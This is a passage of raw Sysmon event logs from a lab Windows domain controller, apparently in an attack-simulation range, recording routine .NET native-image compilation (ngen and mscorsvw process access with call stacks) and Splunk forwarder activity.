1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020675Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.759{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D3-60D3-AB03-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020674Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:19.759{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D3-60D3-AB03-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020673Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:19.696{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D3-60D3-AA03-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020672Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.681{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D3-60D3-AA03-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020671Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:19.681{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D3-60D3-AA03-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020670Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:19.650{4DB9351A-A1D3-60D3-A903-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a3c-0\Microsoft.PowerShell.Security.dll2021-06-23 21:04:19.650 23542300x800000000000000020669Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.478{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2B53BB20BE6013E35F08160BAF55293,SHA256=E14051FF9CB1B363BEF9B6640C0B31371215D2F942CD09758B9565D0CB140E8D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020668Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.462{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D3-60D3-A903-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020667Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.446{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D3-60D3-A903-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020666Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:19.446{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D3-60D3-A903-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020665Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:19.400{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D3-60D3-A803-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020664Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.384{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D3-60D3-A803-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020663Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:19.384{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D3-60D3-A803-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020662Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:19.353{4DB9351A-A1D2-60D3-A703-00000000CF01}6584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19b8-0\Microsoft.PowerShell.ScheduledJob.dll2021-06-23 21:04:19.353 354300x800000000000000020661Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:17.220{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61424-false10.0.1.12-8000- 10341000x800000000000000020660Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:18.995{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D2-60D3-A703-00000000CF01}6584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:20.509{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F7BE54D8C2E5683825761A53313CCCF,SHA256=75FB7042DA5042EF060F392A719C079B377984AF481C55E7330DDCC815063514,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020684Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:20.118{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D4-60D3-AD03-00000000CF01}6300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020683Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:20.103{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D4-60D3-AD03-00000000CF01}6300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020682Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:20.103{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D4-60D3-AD03-00000000CF01}6300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020681Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:20.056{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D4-60D3-AC03-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020680Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:20.040{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D4-60D3-AC03-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020679Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:20.040{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D4-60D3-AC03-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020678Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:20.009{4DB9351A-A1D3-60D3-AB03-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1af0-0\Microsoft.PowerShell.Security.Activities.dll2021-06-23 21:04:20.009 23542300x800000000000000020694Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:21.525{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51398E40DC09966F733A2A686BEB107D,SHA256=8553B0A8A56DC0940C86487EF8036C4E5AE78B5939B9FB9CD9AF8857FD148F56,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020693Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:21.228{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D5-60D3-AF03-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020692Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:21.212{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D5-60D3-AF03-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020691Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:21.212{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D5-60D3-AF03-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsv